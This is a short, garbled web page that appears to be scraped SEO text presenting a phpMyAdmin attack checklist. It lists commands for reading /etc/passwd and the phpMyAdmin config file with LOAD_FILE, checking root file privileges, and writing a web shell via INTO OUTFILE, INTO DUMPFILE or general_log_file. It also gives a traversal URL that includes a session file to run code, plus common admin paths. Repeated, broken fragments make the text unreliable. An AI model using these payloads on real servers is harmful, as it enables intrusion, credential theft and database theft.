Phpmyadmin Hacktricks Jun 2026

SYSTEM('whoami');

💡 If INTO OUTFILE fails, try INTO DUMPFILE or use general_log_file to write a shell. phpmyadmin hacktricks

Here’s your 60-second phpMyAdmin attack checklist 👇 SYSTEM('whoami'); 💡 If INTO OUTFILE fails, try INTO

SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.inc.php'); 💡 If INTO OUTFILE fails

By manipulating the target parameter in the URL with directory traversal sequences (e.g., index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[SESSION_ID] ), the attacker forces phpMyAdmin to include and execute the session file containing the malicious code. Writing a Web Shell (SELECT ... INTO OUTFILE)

/phpmyadmin , /pma , /db/admin , /mysql/admin

Dump entire databases using the "Export" tab or SQL queries. 🛠️ Common Payloads & Commands SQL / Action SELECT user, file_priv FROM mysql.user WHERE user='root'; See if you can write files. Write Web Shell